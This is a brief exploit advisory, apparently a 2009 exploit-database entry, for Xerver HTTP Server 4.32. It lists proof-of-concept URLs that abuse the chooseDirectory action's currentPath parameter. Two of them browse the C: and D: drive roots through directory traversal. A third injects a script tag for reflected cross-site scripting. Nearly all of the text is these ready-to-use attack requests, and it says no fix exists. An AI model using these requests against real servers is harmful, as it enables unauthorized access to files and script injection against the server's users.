Xerver HTTP Server 4.32 XSS - Directory Traversal Vulnerabilities

2009-09-18 21:07:01

Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability


By Stack


Directory Traversal Exploit :

http://127.0.0.1:32123/action=chooseDirectory&currentPath=d:%5C

http://127.0.0.1:32123/action=chooseDirectory&currentPath=c:\




XSS Exploit :


http://127.0.0.1:32123/action=chooseDirectory&currentPath='">><script>alert('XSS By Stack')</script>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.